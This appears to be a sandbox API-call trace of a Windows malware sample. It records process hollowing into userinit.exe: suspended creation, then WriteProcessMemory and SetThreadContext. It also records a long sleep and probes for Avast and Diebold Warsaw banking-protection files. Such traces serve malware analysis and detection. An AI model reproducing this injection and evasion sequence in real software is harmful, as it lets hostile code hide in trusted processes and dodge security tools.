[0127.144] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0127.144] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.145] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.145] GlobalUnlock (hMem=0x95000c) returned 0
[0127.145] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0127.145] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.145] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.145] GlobalUnlock (hMem=0x95000c) returned 0
[0127.145] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0127.146] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.146] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.146] GlobalUnlock (hMem=0x95000c) returned 0
[0127.146] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0127.146] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.147] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.147] GlobalUnlock (hMem=0x95000c) returned 0
[0127.147] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0127.147] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.148] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.148] GlobalUnlock (hMem=0x95000c) returned 0
[0127.148] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0127.148] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.149] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.149] GlobalUnlock (hMem=0x95000c) returned 0
[0127.149] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0127.149] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.149] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.149] GlobalUnlock (hMem=0x95000c) returned 0
[0127.149] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0127.149] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.150] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.150] GlobalUnlock (hMem=0x95000c) returned 0
[0127.150] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0127.150] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.151] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.151] GlobalUnlock (hMem=0x95000c) returned 0
[0127.151] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0127.151] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.152] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.152] GlobalUnlock (hMem=0x95000c) returned 0
[0127.152] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0127.152] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.153] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.153] GlobalUnlock (hMem=0x95000c) returned 0
[0127.153] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0127.153] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.154] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.154] GlobalUnlock (hMem=0x95000c) returned 0
[0127.154] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0127.154] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.155] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.155] GlobalUnlock (hMem=0x95000c) returned 0
[0127.155] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0127.155] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.155] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.155] GlobalUnlock (hMem=0x95000c) returned 0
[0127.155] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0127.155] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.156] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.156] GlobalUnlock (hMem=0x95000c) returned 0
[0127.156] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0127.156] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.157] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.157] GlobalUnlock (hMem=0x95000c) returned 0
[0127.157] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0127.157] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.158] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.158] GlobalUnlock (hMem=0x95000c) returned 0
[0127.158] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0127.158] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0127.159] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x104, hThread=0x108, dwProcessId=0x854, dwThreadId=0x860)) returned 1
[0127.161] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0127.162] GetThreadContext (in: hThread=0x108, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffda000, Edx=0x0, Ecx=0x0, Eax=0x6d2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6ff48, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0127.162] ReadProcessMemory (in: hProcess=0x104, lpBaseAddress=0x7ffda008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0127.162] VirtualAllocEx (hProcess=0x104, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0127.162] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1990000
[0127.162] VirtualAlloc (lpAddress=0x1990000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x1990000
[0127.164] VirtualAlloc (lpAddress=0x1980000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1980000
[0127.169] WriteProcessMemory (in: hProcess=0x104, lpBaseAddress=0x400000, lpBuffer=0x197cb88*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x197cb88*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0127.181] WriteProcessMemory (in: hProcess=0x104, lpBaseAddress=0x7ffda008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0127.181] SetThreadContext (hThread=0x108, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffda000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6ff48, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0127.182] ResumeThread (hThread=0x108) returned 0x1
[0127.182] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0127.182] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0127.182] GlobalUnlock (hMem=0x95000c) returned 0
[0127.182] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0127.182] GlobalUnlock (hMem=0x950004) returned 0
[0127.188] Sleep (dwMilliseconds=0xe74e)
[0137.195] VirtualFree (lpAddress=0x19e0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0137.196] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0137.196] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0137.196] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0137.196] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0137.196] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110
